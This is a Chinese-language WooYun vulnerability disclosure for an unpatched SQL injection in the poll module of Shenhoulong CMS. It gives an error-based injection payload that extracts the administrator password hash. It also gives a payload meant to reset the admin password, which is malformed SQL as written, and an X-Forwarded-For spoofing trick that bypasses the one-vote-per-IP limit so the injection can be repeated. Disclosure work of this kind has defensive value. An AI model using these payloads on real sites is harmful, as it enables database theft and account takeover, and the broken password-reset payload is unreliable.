当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048686

漏洞标题:深喉咙CMS(shlcms PHP)SQL注射0day

相关厂商:深喉咙CMS

漏洞作者: 数据流

提交时间:2014-01-12 19:45

修复时间:2014-02-26 19:46

公开时间:2014-02-26 19:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

(PS:这CMS的名字令人遐想)
http://www.shenhoulong.com/ 隶属公司http://company.loooe.com/

详细说明:

/Deepthroat/content/poll/ -> index.php

if ($request['vtype']=='a')
  57              {    
  58                  $db->query("UPDATE ".TB_PREFIX."poll SET num=num+1 WHERE id=".$request['choice']);
  59                  
  60                  $db->query("UPDATE ".TB_PREFIX."poll_category SET client_ip='".$insert_ip."' WHERE id=".$params['args']);
  61                  
  62                  echo '<script>alert("投票成功!");window.location.href="'.$url.'";</script>';
  63              }
  64              elseif ($request['vtype']=='b')
  65              {
  66                  for ($i=0;$i<count($request['choice']);$i++)
  67                  {
  68                   $db->query("UPDATE ".TB_PREFIX."poll SET num=num+1 WHERE id=".$request['choice'][$i]);
  69                  }
  70                  $db->query("UPDATE ".TB_PREFIX."poll_category SET client_ip='".$insert_ip."' WHERE id=".$params['args']);
  71                  
  72                  echo '<script>alert("投票成功");window.location.href="'.$url.'";</script>';
  73              }
  74          }


投票处选项ID 参数choice没有做过滤就带入数据库查询导致注入漏洞的产生

QQ截图20140112190842.jpg


UPDATE注射 唯有用显错注射
投票时抓包 choice参数改成SQL语句
POC:

and (select 1 from  (select count(*),concat((select ((select pwd from shl_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);


QQ截图20140112191109.jpg


密码很变态
加密函数:/Deepthroat/inc/ -> class.shlencryption.php 

<?php 
   2  class shlEncryption
   3  {
   4      var $enstr = null;
   5  	function shlEncryption($str)
   6      {
   7          $this->enstr = $str;
   8      }
   9  	function get_shal()
  10      {
  11          return sha1($this->enstr);
  12      }
  13  	function get_md5()
  14      {
  15          return md5($this->enstr);
  16      }
  17  	function get_jxqy3()
  18      {
  19          $tmpMS = $this->get_shal().$this->get_md5();
  20          $tmpNewStr = substr($tmpMS,0,9).'s'.substr($tmpMS,10,9).'h'.substr($tmpMS,20,9).'l'.substr($tmpMS,30,9).'s'.substr($tmpMS,40,9).'u'.substr($tmpMS,50,9).'n'.substr
  21  ($tmpMS,60,9).'y'.substr($tmpMS,70,2);
  22          $tmpNewStr = substr($tmpNewStr,-36).substr($tmpNewStr,0,36);
  23          $tmpNewStr = substr($tmpNewStr,0,70);
  24          $tmpNewStr = substr($tmpNewStr,0,14).'j'.substr($tmpNewStr,14,14).'x'.substr($tmpNewStr,28,14).'q'.substr($tmpNewStr,32,14).'y'.substr($tmpNewStr,56,14).'3';
  25          return $tmpNewStr;
  26      }
  27  	function to_string()
  28      {
  29          $tmpstr = $this->get_jxqy3();
  30          $tmpstr = substr($tmpstr,-35).substr($tmpstr,0,40);
  31          return $tmpstr;
  32      }
  33  }
  34  ?>


SHA1加密的值加上MD5加密的值 然后各种substr HASH基本不能逆了
运气好的可以去UPDATE一下密码
把密码update成admin:

and (select 1 from  (select count(*),concat((select ((update pwd = '33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj' where username='admin')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);


虽然密码解密不了 但还可以基于SQL注射进行下一步渗透
可投票时候做了限制 只允许一个IP投票一次 也就代表一个IP只能执行一次SQL注射语句
这对于进一步的渗透是很麻烦
/Deepthroat/content/poll/ -> index.php

if(!empty($request['vtype'])&&!empty($request['choice']))
  33          {
  34              $sql="SELECT * FROM ".TB_PREFIX."poll_category WHERE id=".$params['args'];
  35              $poll_client=$db->get_row($sql);
  36              $cur_ip=getip();
  37              if(empty($poll_client->client_ip))
  38              {
  39                  $insert_ip=$cur_ip;
  40              }
  41              else
  42              {
  43                  $checkIP=split(';',$poll_client->client_ip);
  44                  if(in_array($cur_ip,$checkIP))
  45                  {
  46                      echo "<script language='javascript'>alert('您已经投过票了!');window.history.go(-1);</script>";
  47                      exit;
  48                  }
  49                  array_push($checkIP,$cur_ip);
  50                  $insert_ip=implode(';',$checkIP);
  51              }


看看getip()函数
/Deepthroat/inc/function.php -> line 347

function getip()
 348  {
 349      if(getenv('HTTP_CLIENT_IP'))
 350      {
 351          $client_ip = getenv('HTTP_CLIENT_IP');
 352      }
 353      elseif(getenv('HTTP_X_FORWARDED_FOR'))
 354      {
 355          $client_ip = getenv('HTTP_X_FORWARDED_FOR');
 356      }
 357      elseif(getenv('REMOTE_ADDR'))
 358      {
 359          $client_ip = getenv('REMOTE_ADDR');
 360      }
 361      else
 362      {
 363          $client_ip = $HTTP_SERVER_VAR['REMOTE_ADDR'];
 364      }
 365      return ip2long($client_ip);


那么利用X-FORWARDED-FOR可以伪造 从而突破限制
X-FORWARDED-FOR: 8.8.8.8

1.jpg


漏洞证明:

zz.jpg

修复方案:

版权声明:转载请注明来源 数据流@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝